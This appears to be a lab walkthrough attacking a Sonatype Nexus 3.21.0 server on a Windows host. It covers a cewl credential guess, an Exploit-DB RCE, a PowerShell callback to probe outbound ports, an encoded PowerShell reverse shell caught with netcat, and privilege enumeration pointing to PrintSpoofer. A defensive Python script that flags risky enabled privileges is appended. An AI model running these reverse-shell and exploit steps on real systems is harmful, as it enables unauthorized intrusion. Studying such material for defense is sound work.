:8081 - http://192.168.154.61:8081/
Landing Page - Sonatype Nexus Repository Manager OSS 3.21.0-05
# googled the product/version
# 2 login users
- admin (all privileges)
- anonymous (R-only)
# default creds not working
# no other attack vectors; time to cewl
# creds found: nexus:nexus
Using https://www.exploit-db.com/exploits/49385
# ping works but outbound ports are blocked
# checked which outbound ports are open with:
CMD='powershell.exe -c wget 192.168.49.122:21/kashz'
# working ports: 21, 80, 8081
# generate encoded ps
$ python3 /opt/powershell_encoded_revshell/powershell_encoded_revshell.py 192.168.49.122 21
$ nc -lvnp 21
listening on [any] 21 ...
connect to [192.168.49.122] from (UNKNOWN) [192.168.122.61] 49837
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami
billyboss\nathan
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> systeminfo
Host Name: BILLYBOSS
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.18362 N/A Build 18362
System Type: x64-based PC
Hotfix(s): 6 Hotfix(s) Installed.
# SeImpersonatePrivilege is enabled; printSpoofer is definitely one way
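Added audit check, not part of the original notes: parse `whoami /priv` output and flag enabled privileges that let an account act as other principals, which is exactly what the SeImpersonatePrivilege finding above rests on. The high-risk list is this example's own selection, and the sample is the output captured above.

```python
import re
from typing import Dict, List

# Privileges commonly treated as high-risk on a service account because, when
# enabled, they let the holder act as other security principals or bypass ACLs.
# This list is the example's own selection, not from the original notes.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate other accounts via token impersonation",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "attach to and read memory of any process",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
}

# Constructed sample: the 'whoami /priv' output captured in the notes above.
SAMPLE = """PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

# One table row: name, free-text description, then Enabled/Disabled.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

def parse_privs(text: str) -> Dict[str, str]:
    """Map privilege name -> 'Enabled'/'Disabled' from 'whoami /priv' output."""
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs

def risky_enabled(privs: Dict[str, str]) -> List[str]:
    """High-risk privileges that are currently enabled, sorted by name."""
    return sorted(p for p, state in privs.items() if p in HIGH_RISK and state == "Enabled")

if __name__ == "__main__":
    for p in risky_enabled(parse_privs(SAMPLE)) or []:
        print(f"{p}: {HIGH_RISK[p]}")  # for the sample: SeImpersonatePrivilege
```

Run it against the output of `whoami /priv` for each service account (here the Nexus service runs as nathan) to decide which accounts should have the privilege removed or the service moved to a less privileged identity.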